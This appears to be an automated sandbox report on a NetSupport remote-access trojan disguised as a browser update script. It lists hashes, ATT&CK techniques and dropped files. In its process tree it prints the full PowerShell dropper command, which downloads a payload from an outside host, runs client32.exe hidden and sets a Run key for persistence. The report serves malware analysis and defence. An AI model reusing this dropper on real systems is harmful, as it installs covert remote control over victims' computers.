netsupport | f69fc48e63d4a52deea5efe6e6e5f3d2dc1fd0494d7969d7a2f48639e0cea4ff

Analysis

max time kernel
144s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231130-en
resource tags

arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
submitted
13/12/2023, 21:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Update_browser_17.6436.js
Size

297KB
MD5

21672be9e05cd64b67a78bf882b9faa2
SHA1

9d511b85ee408e1bfc15856f4cd55a83ed748c6b
SHA256

89d46c03b8da238b4bca7ad1d0673da49acb5b6bbdadb8f2467ab289c18d6b37
SHA512

95d936119230e2523bea6c42f1309d12e2d11f4f1ed6dab816175038ad2d875a973c4d6edef6e08b4c4fb93c13cb8e9e8a95ddd032aef4db8f7ea12b8e0e4f21
SSDEEP

3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BC/OpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6BZcJ6QhO1T7cZd6Bp

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://mindsnatchers.com/GetImageData.php?11080

exe.dropper

https://mindsnatchers.com/GetImageData.php?11080

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	3244	wscript.exe
30	1228	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3936660601-1848837011-2142350499-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
1780	client32.exe

Loads dropped DLL 6 IoCs

pid	Process
1780	client32.exe
1780	client32.exe
1780	client32.exe
1780	client32.exe
1780	client32.exe
1780	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3936660601-1848837011-2142350499-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVXX = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX-615\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1228	powershell.exe
1228	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeSecurityPrivilege	1780	client32.exe
Token: SeManageVolumePrivilege	4448	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1780	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 3244 wrote to memory of 1228	3244	wscript.exe	92
PID 3244 wrote to memory of 1228	3244	wscript.exe	92
PID 1228 wrote to memory of 1780	1228	powershell.exe	100
PID 1228 wrote to memory of 1780	1228	powershell.exe	100
PID 1228 wrote to memory of 1780	1228	powershell.exe	100

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Update_browser_17.6436.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $OOKAzuMJHRbPQnAiDIUqUC='https://mindsnatchers.com/GetImageData.php?11080';$cegrpKNEZTUKKIIZZzQzPGbDPeCisJ=(New-Object System.Net.WebClient).DownloadString($OOKAzuMJHRbPQnAiDIUqUC);$FRzsVmAGXFbcbUZQBnMp=[System.Convert]::FromBase64String($cegrpKNEZTUKKIIZZzQzPGbDPeCisJ);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $dFzbdyAIGejsHBjnxJSnhtorjTynZT=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $dFzbdyAIGejsHBjnxJSnhtorjTynZT -PathType Container)) { New-Item -Path $dFzbdyAIGejsHBjnxJSnhtorjTynZT -ItemType Directory };$p=Join-Path $dFzbdyAIGejsHBjnxJSnhtorjTynZT 'rtr.zip';[System.IO.File]::WriteAllBytes($p,$FRzsVmAGXFbcbUZQBnMp);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$dFzbdyAIGejsHBjnxJSnhtorjTynZT)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $dFzbdyAIGejsHBjnxJSnhtorjTynZT 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $dFzbdyAIGejsHBjnxJSnhtorjTynZT -Force; $FSDFSSD.attributes='Hidden';$s=$dFzbdyAIGejsHBjnxJSnhtorjTynZT+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIVXX';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Users\Admin\AppData\Roaming\DIVX-615\client32.exe
    "C:\Users\Admin\AppData\Roaming\DIVX-615\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:1780

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:5044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tw0blbzp.l35.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\HTCTL32.DLL

Filesize
59KB

MD5
d2cfdb20122e57b117e44db538b7ac7a

SHA1
b1e205e52bfd4e61485c797ced49fb1a504b12c4

SHA256
fe86c99c4811b39cbde74dda044920767e9eb3723eb97a0ac9ce85a040a49b6b

SHA512
da7269233cac122d3dacaef176be9985e54b2914af216b8b5a902ba72b9d355b0e7c021cc508e8b87c7de46c7779a80d6a507397bda6dcc1e765ffcd28ca9025

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\HTCTL32.DLL

Filesize
124KB

MD5
8ba39ab4422363a44c72b3b04958e0ee

SHA1
7a915c2dcc629acbac3387bb9c2f4af993ae7af8

SHA256
6ebf81d9f9aba79369c31723f4f19eee8c4ad4dd4fcca004e3a772363c25ad2e

SHA512
36fc57934ffeefd269cfef09f67e0d36d45712504295414fef4d1a100aa812b710c09d72d81bf08f3552d758baf2ed9202de9d88244d8ec17ab563b5ffa45434

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\MSVCR100.dll

Filesize
155KB

MD5
fd4e9e575386772f4afd34278c8ddce6

SHA1
dc49f6e3aa3827da3e26b3ea05565c956e541d90

SHA256
85f89061f395e8e69df6136ef391178adba7df6fee3c4facfe359705624e4d49

SHA512
c1c867ea24a304e32eafcaf381b17cf2bd04460cb8e3ee75bdc79abc10fb9ec6123fab6a01a508da868e9bb4d47581b7fa44a12272e374b2c7ea08fe751e2cb2

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\PCICL32.DLL

Filesize
205KB

MD5
b1ba231550138c8b66404d0f72a2fcb6

SHA1
152485e9e88efd0fbfc75637b5d155bf5195cd3c

SHA256
ab31cbac9a495a8eb0fd0dc8bd746d97518fcb27fc14980b4398d104d1f454f9

SHA512
a33102775cf20b95de3694fd11215165b80c5690de0ac575a006bef39ddb5a73b5690109a24c2784caeffb10234ac899ceb31a9a5b7b3fc94114dee2c58d0a1b

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\PCICL32.dll

Filesize
143KB

MD5
6924dabfd88f6f0838fa927eedb29bdc

SHA1
2fd906d30e7313f07a9311e2676844118ce18de8

SHA256
2c7bb597bbeff2441f20d9aa229b072113ae02e48d55f9d1c42aeda26559f64a

SHA512
ee0ad619738b4340125f1a3cac109ba5c372144b83acdcc8589a83bbe3c67976b79c8fde12ed7fe9527b0369a4a710d60cc9c96432133fd16b2c65b8bba2c346

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\client32.ini

Filesize
670B

MD5
b11f62b15f97cf5afb117e967c223882

SHA1
d6cc3f4c7cad5bf28d9c44bee2362b8edc69097b

SHA256
13fe71354608a9345d9d7c1600568ec911d718ece989442a39a5601e5fe35586

SHA512
85dbba7dcb1aa1015c186567b06ca2ae5a782a21b0b4008496fb831b39f27e5ee79c716e46aa07a9392fd3037aa1e7b4dbb47f217b1f0eb1c7fc9516d775cc7a

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\msvcr100.dll

Filesize
230KB

MD5
0f4b583181785f85534d5702e88c842c

SHA1
1bd3b190885ee3b2ebb4970250347aff757efb43

SHA256
224d38e330955884506e8be79089a27f11d5c1378d253123724e92549a212b10

SHA512
f6b53f96ac86e30650d9ebc17e317769870334c43e781734001a81e3e7c233c519a9eb98577009cbf15f9e83441e537866ba2d6d04ebf1c2ddee76a2de2e0980

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\msvcr100.dll

Filesize
180KB

MD5
b38fe2c8520771f2e0ef41e160c0f11d

SHA1
1f9cce653daa519042a46e1bdab424612c985cf1

SHA256
25ab556b3ab76da416d6a1b8dfcd1ae79176961c20b3c7619e2d96f80ec583c7

SHA512
5876e2331c288d510c5ba39d9bdf1d29cb0230235ea8e8a953de76df0c62887333676c6c9c5a1818eb714c85d097a0508cf42c89bcc9539bff189e224c019a74

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-615\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
memory/1228-0-0x00000297F0E00000-0x00000297F0E22000-memory.dmp

Filesize
136KB

Download
memory/1228-14-0x00000297F0E60000-0x00000297F0E6A000-memory.dmp

Filesize
40KB

Download
memory/1228-15-0x00000297F0E90000-0x00000297F0EA2000-memory.dmp

Filesize
72KB

Download
memory/1228-11-0x00000297F10B0000-0x00000297F10C0000-memory.dmp

Filesize
64KB

Download
memory/1228-78-0x00007FFF68950000-0x00007FFF69411000-memory.dmp

Filesize
10.8MB

Download
memory/1228-12-0x00000297F10B0000-0x00000297F10C0000-memory.dmp

Filesize
64KB

Download
memory/1228-10-0x00007FFF68950000-0x00007FFF69411000-memory.dmp

Filesize
10.8MB

Download
memory/4448-84-0x0000018B9F790000-0x0000018B9F7A0000-memory.dmp

Filesize
64KB

Download
memory/4448-100-0x0000018B9F890000-0x0000018B9F8A0000-memory.dmp

Filesize
64KB

Download
memory/4448-116-0x0000018BA7E80000-0x0000018BA7E81000-memory.dmp

Filesize
4KB

Download
memory/4448-117-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-118-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-119-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-120-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-121-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-122-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-123-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-124-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-125-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-126-0x0000018BA7EB0000-0x0000018BA7EB1000-memory.dmp

Filesize
4KB

Download
memory/4448-127-0x0000018BA7AD0000-0x0000018BA7AD1000-memory.dmp

Filesize
4KB

Download
memory/4448-128-0x0000018BA7AC0000-0x0000018BA7AC1000-memory.dmp

Filesize
4KB

Download
memory/4448-130-0x0000018BA7AD0000-0x0000018BA7AD1000-memory.dmp

Filesize
4KB

Download
memory/4448-133-0x0000018BA7AC0000-0x0000018BA7AC1000-memory.dmp

Filesize
4KB

Download
memory/4448-136-0x0000018BA7A00000-0x0000018BA7A01000-memory.dmp

Filesize
4KB

Download
memory/4448-148-0x0000018BA7C00000-0x0000018BA7C01000-memory.dmp

Filesize
4KB

Download
memory/4448-150-0x0000018BA7C10000-0x0000018BA7C11000-memory.dmp

Filesize
4KB

Download
memory/4448-151-0x0000018BA7C10000-0x0000018BA7C11000-memory.dmp

Filesize
4KB

Download
memory/4448-152-0x0000018BA7D20000-0x0000018BA7D21000-memory.dmp

Filesize
4KB

Download